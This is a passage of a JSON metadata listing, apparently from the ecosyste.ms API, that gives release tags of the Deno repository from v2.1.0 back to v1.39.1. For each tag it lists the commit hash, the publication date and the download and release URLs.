no/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denolan